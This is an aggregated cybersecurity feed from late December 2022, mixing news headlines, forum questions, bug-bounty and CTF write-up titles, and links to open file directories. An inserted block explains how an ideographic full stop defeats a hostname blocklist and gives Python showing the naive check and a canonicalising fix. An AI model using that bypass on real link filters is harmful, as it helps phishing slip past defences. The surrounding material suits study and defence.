    Japan's National Police Agency has successfully decrypted files encrypted by the LockBit ransomware group, helping at least 3 companies recover their data without paying a ransom.
    Introduction to in-vehicle intrusion detection and prevention systems
    In this article we give a detailed introduction to strategies for addressing automotive cybersecurity risk, in particular in-vehicle intrusion detection and prevention systems.
    After Musk's frantic 75% layoffs, Twitter suffers a global outage
    Tens of thousands of Twitter users reported that Twitter was failing; users could not access the site or use its main functions.
  • Open

    Don Quixote DevOps
    Running a SAST only testing environment may create a Don Quixote scenario: too many costly false positives that eat up your team’s time… Continue reading on Medium »
  • Open

    Lots of music videos
    Lots of oldies, 70's, 80's etc. http://162.212.178.138:8080/gsongs/ submitted by /u/Expensive-Vanilla-16 [link] [comments]
    Classic cartoons and tv shows
    https://wm.sirens.rocks/music/Michael%20Giacchino/ Full music albums from some movies. http://fina.dyndns.tv/Cartoons/ Classic cartoons (and more in the parent directory). https://wm.sirens.rocks/music/ More music. submitted by /u/Waste-Release-6235 [link] [comments]
    NES game manuals
    http://www.tendohub.com/Manuals/NES/ submitted by /u/Waste-Release-6235 [link] [comments]
    Nice selection of music
    http://www.ashleecadell.com/xyzstorelibrary/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    FreeBuf Morning Report | Twitter is experiencing a global outage; Google smart speakers have a backdoor
    BILLU: B0X hands-on lab walkthrough
    BILLU: B0X is a Vulnhub lab machine rated medium difficulty.
    Business security under high-severity vulnerabilities, and dividing responsibility for public-cloud data leaks | FB defender group discussion
    How do you patch a high-severity vulnerability in a business that cannot be interrupted? How is responsibility shared when a data leak happens in the public cloud?
    How underground groups exploit stolen identities and deepfakes
    A growing number of deepfake attacks are significantly reshaping the threat landscape for organizations, financial institutions, celebrities, political figures and even ordinary people.
    Cloud security: a summary of OSS object storage security
    A single Alibaba Cloud account cannot create more than 100 Buckets in the same region. Once a Bucket is created, its name cannot be changed.
    Ohio court and police department hit by LockBit ransomware attack
    The attackers installed ransomware named LockBit and demanded a ransom payment to obtain certain files.
    Check now: thousands of Citrix servers are at serious security risk
    Thousands of Citrix ADC and Gateway deployments remain at risk, even though the vendor had already fixed two critical security vulnerabilities before this.
    270,000 patients' information leaked: Louisiana hospital hit by ransomware attack
    Lake Charles Memorial Hospital in Louisiana announced that it recently suffered a ransomware attack in which the information of nearly 270,000 patients was leaked.
    BitKeep hit by cyberattack, cryptocurrency losses exceed $9 million
    Blockchain crypto wallet BitKeep confirmed on December 28 a cyberattack aimed at stealing users' cryptocurrency.
    DirtyPipe (CVE-2022-0847) vulnerability analysis
    CVE-2022-0847 DirtyPipe is a vulnerability in the Linux kernel that allows writing to read-only files, leading to privilege escalation.
  • Open

    Heya guys! Got a lappy for Xmas. I'm getting into pen testing, went with ParrotOS instead of Kali. Any tips or suggestions, software, etc I should know?
    Specs: OS: Parrot OS 5.1 [Security] CPU: Intel i5-8365U @ 4.100MHz RAM: 16GB DDR3 @ 3200MHz Storage: 1TB WD Blue NVMe M.2 SSD. I'm not a complete Linux noob; I'm a mix between entry level and somewhat adept I'd say, but leaning towards the beginner side a little. I have a NAS I set up with OpenMediaVault, which is dependent upon the terminal, so I can get around one most times. It's running a MiniDLNA server hosting all my movies, got OS's backed up on it, etc. Went with ParrotOS Sec over Kali [BlackArch is far too intimidating for me, as is Arch in general] due to this laptop also sorta serving as a secondary mobile daily driver. I have a somewhat beastly Windows gaming rig as my main D.D. This machine is primarily for pen testing and network engineering [learning those, to be exact], so any tips, resources, scripts, programs you guys know of, please recommend! Starting points would be very nice. I've already toyed around with hacking WiFi networks [ethically, of course] with Airgeddon. Thanks in advance! Also to add: this is my first real time using Linux desktop environments in this capacity; most previously was VM stuff. So any tips there are welcomed as well. I came from, of course, long experience with Windows. submitted by /u/I_Collect_Viruses [link] [comments]
    What are some fun cyber security coding projects?
    What are some fun cyber security coding projects? submitted by /u/herbertisthefuture [link] [comments]
    Macbook pro 14
    I want to break into pen testing and HTB; are there any good, solid alternatives to Parallels that are free? submitted by /u/Confident_Nebula_560 [link] [comments]
    Would anyone mind reviewing my resume and letting me know your thoughts? Cause I may start looking for new opportunity next year. (Application Penetration Tester)
    https://imgur.com/a/LDmHbMQ submitted by /u/No-job-no-money [link] [comments]
    Any GRC platforms for SOC 2, NIST, CCPA, etc actually good?
    Trying to find one that works well, have looked at a number of them like OneTrust, LogicGate, StandardFusion, Vanta, etc. All leave something to be desired, wanted to see what others are using to help with SOC audits and GRC internally. submitted by /u/junkaccount1999 [link] [comments]
    Assembly beginner
    Hi, I am interested in RE, and I am following a very interesting course on TCM Academy (https://academy.tcm-sec.com/p/practical-malware-analysis-triage). By the way, I think I'd need more consistent knowledge about how assembly works, how to use a debugger (e.g. x32dbg) and so on. Can anyone recommend a good starting point? Thank you very much! submitted by /u/g-simon [link] [comments]
    Wanting to learn advice
    Hi guys, I have an old Windows 10 PC and I would basically like to learn how to do things on it as a hobby. I'd like to learn how to reinstall it, install new operating systems like Linux or whatever that are secure on it; I don't really know, actually, but basically just learn how to do different things on it just for funsies and as a hobby. Right now I basically just use it to stream jazz music or sounds of nature in the background for my room lol. What can I do with this to learn fun computer things, like learning how to wipe and reboot Windows 10 and installing Linux? What other operating systems are there? What should I do with it? I want to train myself to be like an IT person almost; I'd be excited to learn. **Asknetsec: is there a way that I could learn to plug in an Android and learn how to see if there is malware or viruses on it and do cybersecurity analysis? Or would that be too advanced? What resources do I have to learn these things? Right now I'm planning on just using YouTube, Reddit and Google. If you don't know but know of resources I should check out, I'd appreciate that as well. Thanks! submitted by /u/Normal-Question-1994 [link] [comments]
    Diamond Model activity thread analysis
    Hello, First of all, I hope this post is relevant. I'm working on a presentation about the Solarwinds incident. I want to analyze the threat actor through the diamond model (DM). I've researched the DM and understand the basics i.e. the four edges, its meta-features and the possibility to synthesize (introducing LKC as the phase) with other CTI models. Basically, I want to create an activity thread for the different "incidents" (Sunspot, Sunburst, Teardrop & Raindrop). But when I start looking into how to do this, I don't feel as if I'm understanding it. Here is an example picture of an activity thread: https://i0.wp.com/www.activeresponse.org/wp-content/uploads/2016/08/DiamondModelActivityThreads.jpg?fit=550%2C404&ssl=1 What I don't understand about the activity thread is: Does the arrow edge placement on each diamond mean something? Or is it simply to show the movement between different incidents/stages and understand the flow of the attack(s)? When and why should I introduce multiple diamond shapes into one cell of the activity thread? Why are some diamonds and arrows dotted? submitted by /u/Leosoda [link] [comments]
  • Open

    Cobalt Strike Alternative?
    What post-exploitation framework are you using? Is there an open-source alternative to CS? Is it true that Armitage is very similar (design and operation) to CS? submitted by /u/179Desire [link] [comments]
  • Open

    Using OSINT to Become Better at Ethical Hacking
    Ethical hacking is the use of hacking, but with an ethical approach and goal. It is a vital tool for discovering and tackling… Continue reading on Medium »
    Basic Intro to Intelligence Gathering from Open Sources OSINT
    Continue reading on Medium »
    OSINT
    OSINT & sock Puppets Continue reading on Medium »
    OSINT Case Study: Validating a website if its fraud or legit
    Hey guys, this is me Dheeraj Yadav and in this blog, we will be learning about how to validate if it's a fraud website or a legit one. Continue reading on InfoSec Write-ups »
    Update v1 (Malaysian OSINT resource list)
    This is the 1st update for Malaysian OSINT resource list Continue reading on Medium »
  • Open

    VHL 10.1x.1.95 — James
    Beginner box from Virtual Hacking Labs, scan results below. Continue reading on Medium »
    VHL 10.1x.1.4 — Backup Admin V2
    Intro Here Continue reading on Medium »
    Terms in MITRE ATT&CK
    As I learned the mitre framework, I struggled greatly with mitre terms. Terms like tactics, techniques, sub techniques and procedures… Continue reading on Medium »
    ACTIVE DIRECTORY 101 — SETTING YOUR LAB
    We started simple with what Active Directory(AD) is all about. Now it’s time to go on to build one and grasp the practical knowledge… Continue reading on Medium »
  • Open

    Google releases open-source vulnerability scanning tool
    Article URL: https://www.infoq.com/news/2022/12/google-osv-scanner/ Comments URL: https://news.ycombinator.com/item?id=34175558 Points: 17 # Comments: 1
    Please help me handle a security vulnerability
    In 2018 I discovered a security vulnerability and worked with both government and business to try to correct the issue. After 6 months of phone calls and emails, I opted to accept their proposed fixes and left the entire thing in the hands of the Government of Canada. My feedback was ignored entirely. I wasted ~100 hours and for that I got precisely nothing. On December 21, 2022 I required use of the service in question and once again found a security problem. The same problem. On December 21, 2022 I noted several pieces of evidence which indicate active exploitation of the vulnerability. On December 21, 2022 I contacted: CBC, The business, NDP, and the OPC. To date, none of them have contacted me except for automated responses. I get that it's Christmas but over a week just to hear anything from any human from any of those organizations? Nothing. At the most severe, the security vulnerability threatens life and limb. It impacts approximately 2,000,000 people directly and I would estimate the total impact in the 10s or 100s of millions of people. It impacts people globally. It's causing me too much stress. If you are in a verifiable position of power in Canada, please indicate how I can get in touch with you. Otherwise, please, any advice you have on how I can get rid of this curse without harming anyone is greatly appreciated. Comments URL: https://news.ycombinator.com/item?id=34174110 Points: 16 # Comments: 8
  • Open

    𓅃 Announcing Matano + Crowdstrike: Open source project to analyze security logs on S3 using SQL & build realtime detections-as-code
    submitted by /u/shaeqahmed [link] [comments]
    Writing Windows Kernel Drivers for Advanced Persistence (Part 1)
    submitted by /u/v3ded [link] [comments]
    New CatB Ransomware Employs 2-Year Old DLL Hijacking Technique To Evade Detection
    submitted by /u/woja111 [link] [comments]
    dnstwist: send potential spear phishing domains to Slack
    submitted by /u/nindustries [link] [comments]
    Turning Google smart speakers into wiretaps for $100k
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2022-12-29 Review
    Analysis of the CNC group's "ferry" trojan targeting the defense-industry and education sectors by ourren; List of accepted papers at the four top cybersecurity conferences of 2022 (mainland China) by ourren; [HTB] Jarvis Writeup by 0x584a. For more recent articles, visit SecWiki
  • Open

    Account Takeover Due to Cognito Misconfiguration Earns Me $xxxx
    Hello Guys, I haven’t written anything in a long time. Continue reading on Medium »
    How I Got a Bug at Apple That Leads to Account Takeover of Any User Who Views My Profile
    Hi Team, I am Abdelkader Mouaz, my pseudo is Hamzadzworm; today I will share with you a bug that leads to the takeover of any user's account just if… Continue reading on Medium »
    I found 2 XSS on a bank's website.
    Hello, how are you all? I hope you are well. Continue reading on Medium »
    how to have an effective recon?
    📑 Introduction Continue reading on Medium »
    100 Complex Terms Related to Bug Bounty Explained for a Newbie
    Vulnerability: A weakness or flaw in a computer system or application that can be exploited by an attacker to gain unauthorized access or… Continue reading on Medium »
    Threat Hunting Methodology
    Photo by Tima Miroshnichenko from Pexels Continue reading on Medium »
    Bug Bounty Hunters V/S Nation Sponsored Hackers
    Bug bounty hunters, also known as ethical hackers, are individuals or organizations that specialize in finding and reporting… Continue reading on Medium »
    Difficulty of Reproducing Old Exploits
    I tried to follow the Immunefi article to reproduce the Fei protocol exploit, published June 2021, but it is now December 2022. Continue reading on Medium »
    How I Design My Perfect Bug Bounty Automation (1)
    This is a series of articles about how I designed and implemented my perfect bug bounty automation. It helps me a lot, so I decided to share… Continue reading on Medium »
  • Open

    Chained open redirects and use of Ideographic Full Stop defeat Twitter's approach to blocking links
    Twitter disclosed a bug submitted by jub0bs: https://hackerone.com/reports/1032610 - Bounty: $560
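    An added example of the mechanism named in the report title above (it is not the reporter's code, and the domains are constructed): RFC 3490 IDNA treats U+3002 IDEOGRAPHIC FULL STOP, U+FF0E and U+FF61 as label separators equivalent to ".", and browsers apply the same mapping, so a user who clicks https://evil。com/ is sent to evil.com. A link filter that compares the raw hostname string with its blocklist never sees that equivalence. Python's idna codec implements the same separator rule, which is what the hardened check relies on.

```python
"""Blocklist bypass via alternate full stops, and the canonicalised check (added example)."""
from urllib.parse import urlsplit

# Constructed blocklist for the demonstration.
BLOCKLIST = {"evil.com"}


def raw_host(url: str) -> str:
    """Hostname exactly as it appears in the URL string (already lower-cased)."""
    return urlsplit(url).hostname or ""


def canonical_host(url: str) -> str:
    """Hostname as the network will resolve it.

    The idna codec splits labels on U+002E, U+3002, U+FF0E and U+FF61, joins
    them with an ASCII '.', and punycode-encodes any non-ASCII label, so two
    spellings that reach the same server compare equal after this step.
    """
    host = raw_host(url)
    return host.encode("idna").decode("ascii").lower().rstrip(".")


def naive_is_blocked(url: str) -> bool:
    """String comparison on the raw hostname: the pattern the report defeats."""
    return raw_host(url) in BLOCKLIST


def hardened_is_blocked(url: str) -> bool:
    """Compare the canonical hostname, so 'evil。com' and 'evil.com' match."""
    return canonical_host(url) in BLOCKLIST


if __name__ == "__main__":
    for link in ("https://evil.com/", "https://evil\u3002com/", "https://evil\uff0ecom/"):
        print(f"{link!r:32} naive={naive_is_blocked(link)} hardened={hardened_is_blocked(link)}")
```

Canonicalising before any allow/deny decision, rather than adding U+3002 to a regex, is the durable fix: it also covers the fullwidth and halfwidth variants and mixed-case or trailing-dot spellings that the same filter would otherwise let through.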
    S3 bucket takeover [learn2.khanacademy.org]
    Khan Academy disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1777077
  • Open

    To OOB, or Not to OOB?: Why Out-of-Band Communications are Essential for Incident Response
    tl;dr Communications are critical during an incident. If you cannot coordinate, collaborate, and inform actions and information about an incident, the incident response will eventually fail. Normally, this isn’t an issue, as organizations have resources like Microsoft 365 email, SharePoint, Slack, and Teams to use to communicate with each other. However, what happens when those... The post To OOB, or Not to OOB?: Why Out-of-Band Communications are Essential for Incident Response appeared first on TrustedSec.
  • Open

    Compromising a vulnerable GCP, INE-Labs GCPGoat walkthrough. Part-2
    No content preview
    Flutter Programming and Security Vulnerabilities
    No content preview
    JNDI Injection Series: RMI Vector — Dynamic Class Loading From Remote URL
    No content preview
    $350 XSS in 15 minutes
    Bug Bounty Writeup about DOM XSS via JSONP + Parameter pollution Continue reading on InfoSec Write-ups »
    basic file exploit(100 points)— Binary Exploitation writeup | Pico CTF 2022
    No content preview
    How Capabilities actually Work ? | Exploitation | Privilege Escalation
    No content preview
    Exploiting XSS with Javascript/JPEG Polyglot
    No content preview
  • Open

    Google OSS Fuzzes
    Do like Google and use fuzzing to find and fix bugs at scale. Continue reading on Medium »
  • Open

    Are refurbished routers safe?
    I bought a router on Amazon, and I didn't realize it was used/refurbished until it arrived in a random cardboard box rather than official packaging. Is it possible for the router to be compromised in some way, and if so, are there any tools to scan for this? submitted by /u/Edward_Fingerhands [link] [comments]
    Product Security Engineer Career Path
    Hey folks, I have been working as a Product Security Engineer at a big tech company for about 2 years now and have learned the ropes of the job. I was wondering what the long-term progression for a product security engineer is. Right now, all it feels like is keeping up to date with the latest things happening in security and doing the same thing every release of the product, like code reviews, threat modeling, some dev work if needed, etc. Is AppSec or offensive security a good next step? Thinking of pursuing a certification like OSCP to better my chances of going in that direction. Thoughts? submitted by /u/thekoolhatkar [link] [comments]
    Would anyone mind reviewing my resume and letting me know your thoughts? Cause I may start looking for new opportunity next year.
    https://imgur.com/a/LDmHbMQ submitted by /u/No-job-no-money [link] [comments]
    Graduate Certificate or MS Degree?
    I've been thinking a lot about getting a Master's in Cybersecurity, but the cost is making me hesitant. I don't really need it but always had it as a goal. I got my BS from WGU and am going back and forth on the following: getting a Graduate Certificate from a well-known university, or getting a full MS degree from WGU or a smaller state university. Curious if anyone has a graduate cert and how it went vs. getting a full degree. I know it's much cheaper and you only take about 4 courses total. submitted by /u/snokerpoker [link] [comments]
  • Open

    BufferPwn: RCE vulnerability in the common network code of several first party Nintendo games since the Nintendo 3DS
    [link] [comments]
    G-3PO: A Protocol Droid for Ghidra (a Ghidra script that glosses decompiled functions with GPT-3 generated comments)
    submitted by /u/0xdeba5e12 [link] [comments]
    Attack Surface Reduction BOF
    submitted by /u/IamaCerealKilla [link] [comments]
    Video game save file Trojan personified
    submitted by /u/bemodtwz [link] [comments]
    Certificate Ripper v2 released - tool to extract server certificates
    submitted by /u/Hakky54 [link] [comments]
  • Open

    Pontem Announces Immunefi Bug Bounty For Liquidswap DEX
    Pontem is excited to announce a new bug bounty program for our Liquidswap DEX/AMM, administered via Immunefi. Continue reading on Pontem Network »
    Hacking Basics
    Zero to Hero Hacking Series Continue reading on Medium »
    Feedback Analyzer Exploitation
    Hi, I have recently come across an interesting dashboard of one of the top 10 companies in the world. The dashboard was a feedback… Continue reading on Medium »
    Out Of Band Command Injection
    Command Injection, or OS Command Injection, is a kind of injection vulnerability where an attacker is able to exploit unsanitized user… Continue reading on Medium »
    Unauthorized Sign-up on Subdomain of Subdomain leading to Organization takeover worth $2000
    Hello people, Here I am sharing another four digit write-up which is one of my very old finding. If you haven’t read my previous writeup… Continue reading on InfoSec Write-ups »
    How I Earned My First Bug Bounty Reward of $1000
    In this article, I want to discuss my journey of making $1000 from a bug bounty program and the lessons I learned through this… Continue reading on InfoSec Write-ups »
    Review of the Hashcat Password Cracker
    A necessary tool for password strength checks and penetration testers. Continue reading on Bug Zero »
    How Can You Take Advantage Of The Long-Term Investment Opportunity In Cybersecurity?
    The cybersecurity industry is quickly expanding and creating new methods to defend against sophisticated threats. Continue reading on Bug Zero »
    LDAP anonymous login story of my 3 simple P3 findings in DHS
    Assalamu Alaikum peace be upon you Continue reading on Medium »
    The Joy of Building a Community through Patreon: My Journey with Cyberlix
    As a cybersecurity professional, I have always been interested in finding ways to improve the security of organizations and individuals… Continue reading on Medium »
  • Open

    Nunchucks HackTheBox Walkthrough
    Summary: Nunchucks is a Linux machine and is rated an easy box by Hack The Box. On this box, we will begin with a
  • Open

    How to install and use MOSINT v2.2 (2023) the latest working version || Email OSINT tool || +APIs
    If you are having trouble running MOSINT or installing APIs this should really help. Continue reading on System Weakness »
    How to install and use MOSINT v2.2 (2023) the latest working version || Email OSINT tool || +APIs
    If you are having trouble running MOSINT or installing APIs this should really help. Continue reading on Medium »
    OSINT CTF 2022
    Hello Everyone!!! Continue reading on Medium »
Five-floor challenge
Solution to the challenge posted on 20/12/2022 on the OSINT FR Discord and on Twitter. Continue reading on Medium »

    SecWiki News 2022-12-28 Review
Yi: a project monitoring tool and automated Codeql runs, by ourren; A survey of applications of heterogeneous information networks in software engineering, by ourren; 2022 attack-and-defense exercise trojan special analysis report, by ourren; Mining intelligence from the issues and bug reports of open-source projects and libraries, by ourren; European Union Agency for Cybersecurity 2022 annual threat report, by Avenger. For more of the latest articles, visit SecWiki.

    PwnTillDawn: Vega
    Vega was an easy box residing at IP address 10.150.150.222. As usual we will start off with a rustscan: Continue reading on Medium »
PoC: vulnerability in the HFS (HTTP File Server) 2.3.x application
Introduction Continue reading on Medium »

    Wordpress users Disclosure [ /wp-json/wp/v2/users/ ] Not Resolved ()
    MTN Group disclosed a bug submitted by thewikiii: https://hackerone.com/reports/1784999

    Unauthorized Sign-up on Subdomain of Subdomain leading to Organization takeover worth $2000
    No content preview
    How I Earned My First Bug Bounty Reward of $1000
    No content preview
    The Big Danger With Laravel ( .env file )
    No content preview
    Wireshark twoo — Forensics| PicoCTF Write-up | 100 Points
    No content preview
    Compromising a vulnerable GCP, INE-Labs GCPGoat walkthrough. Part-1
    No content preview

    Knex.js SQL injection vulnerability, unpatched for 6 years
    Article URL: https://github.com/knex/knex/issues/1227 Comments URL: https://news.ycombinator.com/item?id=34160038 Points: 3 # Comments: 0

FreeBuf Morning Report | European Union Agency for Cybersecurity 2022 annual threat report; US Department of Justice investigating the FTX hack
Within hours of the digital-asset derivatives exchange FTX filing for bankruptcy in November, an unknown hacker stole $372 million from FTX.
Research and reflections on the knowledge and skills for building secure commercial cryptography applications
The article covers cryptographic security knowledge from three angles: studying the policies and standards for cryptography assessment, learning its technical knowledge, and hands-on experience with assessment build-out projects.
Cryptocurrency mining pool BTC.com has digital assets stolen, losing $3 million
Of the stolen assets, about $700,000 belonged to BTC.com customers and about $2.3 million belonged to the company.
Latest on the Cambridge Analytica scandal: Meta pays $725 million to settle
Meta Platforms has agreed to pay $725 million to settle a long-running class action filed in 2018.

    System Administrator to Digital Forensics
I got out of the military a few months ago and did IT, but barely did my job. I just wasn't lucky enough to be placed in units where I got a lot of hands-on experience. I don't have many computer skills except desktop support. Anyway, I'm trying to get out of this field of IT and have considered getting a Master's in Digital Forensics. My only concern is: do I need to know programming for digital forensics? I have a Top Secret Clearance and wonder if that will help get a job in that field with no experience. I've been sorting out many options. I'd like to clarify that I have a Bachelor's in Digital Media and Web Technology. The main track I took within that degree was Digital Media. Also, I'd like to add that I'm currently a system admin, but I really do general help desk work. That's just the title I have, lol. I wanted a job where I can make a great impact. I tried to apply for Special Agent federal jobs (1811), but #1, I get rejected because of no background, and #2, I never hear anything back. So now that I've found my interest, I was wondering if this is a good field to get into. I sound all over the place. submitted by /u/confusedwithlife20

    Did the great state of Texas leave their DOT website wide open?
Not sure what all is in this OD, but I noticed mostly PDFs and some wmv's here and there. Not sure if intended or accidental, but lots to explore. Texas DOT submitted by /u/BustaKode

    New AMSI Bypass Using CLR Hooking
submitted by /u/pracsec
    Spice up your persistence: loading PHP extensions from memory
submitted by /u/gid0rah
    Scaling Continuous Security Testing on the Cheap
submitted by /u/DH_Prelude
    Netcomm NF20MESH Cloud Mesh router - Unauthenticated Remote Code Execution
submitted by /u/Gallus

    Should I be setting up 2FA for any program I use? Or only super important stuff?
Hey all! I’ve known about 2FA, but I think I’ve heard someone say it’s not safe, and some people don’t recommend it. But from most things online, people say you might as well set it up. What are your thoughts? I mainly have games/programs that suggest it be set up: Stream & Epic and some other game programs. Thanks! EDIT: after reading into this sub, I see a lot more of what 2FA means. I just mean hooking my phone up to accounts so it also sends a text to my phone with a code. EDIT 2: I should mention I had my accounts compromised after I was SIM swapped. So I’ve been trying to make sure everything’s more secure (I used to only use 2 passwords) and have everything changed to longer/unique single-use passwords. Wondering how I can beef up my security! For some reason I'm paranoid and don’t like the idea of password managers, but I’m sure it’s a good option. submitted by /u/ShallowBox
    How can you scan single-page web apps? Burp isn't built for it, so are there any other tools that would work?
Typically, I'll use Burp Suite to scan and test web apps; however, a client is utilizing a single-page architecture and Burp just doesn't handle it very well. Is there a tool that can scan and provide testing capabilities for single-page web apps? Thanks, and any insight is greatly appreciated!!! submitted by /u/Let_us_Hope
    Backing up iCloud recovery key on Google Drive
I recently turned on Advanced Data Protection for iCloud, which means that if I lose my recovery key, all of my data is lost. In addition to a physical print-out, I have also uploaded an encrypted PDF of the recovery key to Google Drive. Is this a bad idea for some reason? Am I missing a possible security vulnerability? submitted by /u/DogsBucolic
    Why does Google not enable signing in to your account via scanning qr code or code sent to your email on the phone? Like Steam, OneDrive or Discord do.
And any session that is only logged in via QR code/email code should not be able to see the backup codes, change the passwords, see Google passwords in the manager, or log out superior sessions (those that do have the password inputted or an extra 2FA layer), etc. submitted by /u/dan1991Ro
    How do you conduct client vetting for pentesting?
When taking on new clients, what vetting process do you go through to protect yourself as a tester? submitted by /u/Waddup_yall
    Is there any sample for testing credentials/coding leakage from threat intelligence solution?
Hello, we have been using a threat intelligence solution and currently want to test its effectiveness. Do you have any sample on GitHub so that I can check whether the said solution can detect it or not? The code should include corporate credentials (username/passwords). submitted by /u/sanba06c

Harma: an unknown planet, or a creature on Planet X.
Scientists proved that there are 9 major planets in the solar system, but they were wrong… Not long ago, I came across a fascinating book… Continue reading on Medium »

    Experian Vulnerability Shows Any Report with just SSN, DOB, ADR
    Article URL: https://infosec.exchange/@briankrebs/109587022002246891 Comments URL: https://news.ycombinator.com/item?id=34152981 Points: 125 # Comments: 22

AWD attacks from a red-team perspective
Persistence in AWD covers both attack and defense. The AWD (attack-with-defense) format is a competition mode that comprehensively tests participating teams' attack and defense skills and their real-time strategy.
FreeBuf Morning Report | Global anti-ransomware effort to launch next January; Microsoft fined 60 million for privacy policy violations
Australian cyber security minister Clare O'Neil plans to announce in the coming days that a global task force to fight ransomware will begin operating next month.
How to use NetLlix to simulate and test data exfiltration over different network protocols
NetLlix is a powerful data exfiltration tool that lets researchers simulate and test data exfiltration over different network protocols.
Notes from a grey-box code audit
We can use black-box testing to quickly find sources (externally supplied parameters) and white-box review to find sinks (dangerous functions), and so quickly pinpoint vulnerable spots.
Outlook: cybersecurity trends to watch in 2023
This article collects experts' outlooks on the cybersecurity field for the coming year.
Top 10 attack methods commonly used by global cybercrime in 2022
This article lists the most popular attack methods used by cybercrime today, summarizing the top 10 of 2022 to give a deeper understanding of the cybercrime underground.
FB book giveaway #92 | Get "Domain Penetration Attack and Defense Guide" and become an AD domain expert
If the domain controller falls, every machine in the AD domain is under the attacker's control, which is a frightening prospect. AD domain security is therefore critical.
Linux hit by a "perfect score" critical kernel-level vulnerability
The vulnerability has the maximum CVSS score of 10 and affects servers with KSMBD enabled.

    Florida Snow Writeup
    PROLOGUE Continue reading on The Sleuth Sheet »
    How to do OSINT with urban tree data
    Using QGIS, Overpass, Python & open tree data to locate places in images Continue reading on Medium »
    A little Python can go a long, long way (in OSINT)
    Knowing how to program (even a little) can give you a serious advantage in the OSINT game. Continue reading on Medium »
    A Christmas Conspiracy write-up
A Christmas Conspiracy is my first write-up of Hacktoria collaborations. Well, Hacktoria provides story-driven Capture the Flag challenges… Continue reading on Medium »

    Leak of sensitive values to Airflow rendered template
    Internet Bug Bounty disclosed a bug submitted by jrs53: https://hackerone.com/reports/1773895 - Bounty: $480
    SMTP Command Injection in Appointment Emails via Newlines
    Nextcloud disclosed a bug submitted by spaceraccoon: https://hackerone.com/reports/1509216 - Bounty: $250

    Learning Tsurugi - Make volume readable?
I just finished my AAS in CyberSecurity and I'm diving more into forensics. The classes I took on the subject used Deft in labs, which I know is more or less defunct now, and by the guidance of this sub I'm now repeating some of those exercises in Tsurugi. My Linux skills are probably a 4/10, so I apologize if this is a dumb question. In one lab I need to copy data off of a drive being analyzed to a "USB drive." I'm using Hyper-V, and have both devices attached as VHD files. However, I can't seem to unlock the USB drive using sudo mount -o remount,rw '/media/tsurugi/ ' as this results in the error "cannot remount dev/sda1 read-write, is write-protected." Most of what I am finding is related to defective hardware, but this is a virtual drive. I suspect there is a configuration somewhere that I'm missing, but damned if I can find it. (I'm using Hyper-V, which I know is less than ideal, because I already have it installed for several reasons that aren't relevant to this conversation. As such, I can't run another hypervisor. If this is a Hyper-V problem, I will have to table this goal for another time.) Edit: As a workaround, I was able to mount a network share with CIFS. I'd still like to know what I'm doing wrong (besides using Hyper-V) and how to fix it. submitted by /u/rtuite81
    Visualizing Attacker Activity
Good morning /r/computerforensics, is there software that you prefer for making graphical timelines of attacker activities across multiple devices? Thanks! submitted by /u/DeadBirdRugby
    Slow down Bulk Extractor
Hi all, I am doing my project about Bulk Extractor: slowing down the tool or increasing the false (positive, negative) results (anti-carving). I tried to understand the scanner code and experimented with some examples such as encryption and regex testing, but did not get potential results. It seems very hard because the newest version, BE 2.0, has a lot of improvements. So does anyone have any suggestions? Thanks submitted by /u/tthseus

    Brute-force attacks with image captcha bypass using bash script and OCR
CAPTCHA is a kind of security measure in which an application complements its authentication with a challenge and response to keep robots out… Continue reading on Medium »

    SecWiki News 2022-12-27 Review
No news updates today. For more of the latest articles, visit SecWiki.

    Automakers: Is your org ISO/SAE 21434 ready?
Security organizations in automotive manufacturers and suppliers have a huge task underway or ahead of them: to safeguard the software… Continue reading on Medium »

    Navigating the Vast Ocean of Sandbox Evasions
    After creating a bespoke sandbox environment, we discuss techniques used to target malware evasions with memory detection and more. The post Navigating the Vast Ocean of Sandbox Evasions appeared first on Unit 42.

OWASP Juice Shop lab setup
The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the… Continue reading on Medium »
    Efficient methodology to get P2 level - subdomain takeover vulnerability
    Hello Guys, I’m Suprit a cybersecurity enthusiast and researcher. Continue reading on InfoSec Write-ups »
    XXE (XML EXTERNAL ENTITY) Injection
    What is XML external entity injection? Continue reading on Medium »
    Learning Web-Sec - Day 1
    The basics you need to know to get better at SQL injection. Continue reading on Medium »
    Stored XSS vulnerability in Microsoft booking
This blog is about my finding on Microsoft 365. One fine day I was working in my office and I received a calendar invite from my… Continue reading on Medium »

    JNDI Injection Series: RMI Vector — 1
    No content preview
    Safe Opener — Reverse Engineering | PicoCTF 2022 Writeup
    No content preview
    Efficient methodology to get P2 level - subdomain takeover vulnerability
    No content preview
    Tautulli 2.1.9 version; Cross-Site Request Forgery (ShutDown) and Denial of Service (Metasploit)
    No content preview

    A gitbook on ARM exploitation
submitted by /u/Financial-Republic27

DirectX Hook - elegantly implementing a game overlay window
Author: The_Itach1@Knownsec 404 Team. Date: December 27, 2022. Preface: I recently came across a GitHub project and, after analyzing it, found both its code and its interface very well done, so I started studying the code. This article mainly analyzes how it implements the overlay window, which uses minihook + DirectX11(9) Hook + imgui. Minihook project address: TsudaKageyu/minhook: The Mi...

    iPhone weird stuff question
Hey guys, I just noticed something on my phone and realized that weird things have happened on this iPhone in the past few weeks; I just hadn’t thought of it all until now. A photo that I had deleted long ago came back up in my photos library. There was a red dot in the upper right-hand corner of my phone app, and that means that the microphone is on. There was a Safari browser open in my list of open things with past websites that I had saved, even though I had deleted the Safari browser weeks ago. Are these just normal things or am I being hacked? Lol, thank you! submitted by /u/Normal-Question-1994
    Best Password Manager?
Hello all! I realize this question has been asked a thousand times, but I feel I have a good reason for asking again. I currently use LastPass and, due to the most recent breach, I'm not happy with the way they handled it, so I'm looking at switching. From what I've seen, both 1Password and Bitwarden are top of the list. I went to check out 1Password, however, and on the iOS App Store it has pretty bad reviews, and it appears the app has been updated to "1Password 8". Thus, this leads me to why I'm asking this question. I haven't seen this question addressed since the LastPass breach, nor anything on 1Password since the app has been "rebuilt". So, what are your thoughts and opinions? And I realize any password manager can be breached. It's simply the way they handled it that I'm not impressed with. Thank you! submitted by /u/Parceble
    Working in a private cloud MSP. Is it worth it experience wise?
